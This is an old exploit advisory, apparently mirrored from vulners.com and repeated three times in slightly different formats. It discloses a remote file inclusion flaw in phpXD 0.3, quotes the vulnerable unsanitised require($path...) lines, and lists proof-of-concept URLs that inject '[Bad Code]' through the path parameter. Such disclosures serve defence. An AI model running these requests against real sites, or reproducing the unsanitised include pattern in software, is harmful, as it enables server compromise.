phpXD <= 0.3 (path) Remote File Inclusion Vulnerability

2007-01-2400:00:00

vulners.com

           _________________________________
  ________|                                 |________
  &#92;       |              Dr Max Virus       |       /
   &#92;      |                                 |      /
   /      |_________________________________|      &#92;
  /___________&#41;                         &#40;___________&#92;

Script:phpxd
Affected Version:0.3
Downlaoad:http://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz

Author:Dr Max Virus

Bug in (include/)
Vul Code;
require($path."include/dom/Node.php");
require($path."include/dom/Attr.php");
require($path."include/dom/CharacterData.php");
require($path."include/dom/Comment.php");
require($path."include/dom/Document.php");

POC:
http://[target]/[path]/include/dom.php?path=[Bad Code]
http://[target]/[path]/include/dtd.php?path=[Bad Code]
http://[target]/[path]/include/parser.php?path=[Bad Code]

Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk

JSON

phpXD &lt;= 0.3 &#40;path&#41; Remote File Inclusion Vulnerability

Script:phpxd Affected Version:0.3 Downlaoad:http://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz

Author:Dr Max Virus

Bug in (include/) Vul Code; require($path."include/dom/Node.php"); require($path."include/dom/Attr.php"); require($path."include/dom/CharacterData.php"); require($path."include/dom/Comment.php"); require($path."include/dom/Document.php");

POC: http://[target]/[path]/include/dom.php?path=[Bad Code] http://[target]/[path]/include/dtd.php?path=[Bad Code] http://[target]/[path]/include/parser.php?path=[Bad Code]

Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk

phpXD <= 0.3 (path) Remote File Inclusion Vulnerability

Script:phpxd
Affected Version:0.3
Downlaoad:http://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz

Bug in (include/)
Vul Code;
require($path."include/dom/Node.php");
require($path."include/dom/Attr.php");
require($path."include/dom/CharacterData.php");
require($path."include/dom/Comment.php");
require($path."include/dom/Document.php");

POC:
http://[target]/[path]/include/dom.php?path=[Bad Code]
http://[target]/[path]/include/dtd.php?path=[Bad Code]
http://[target]/[path]/include/parser.php?path=[Bad Code]

Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk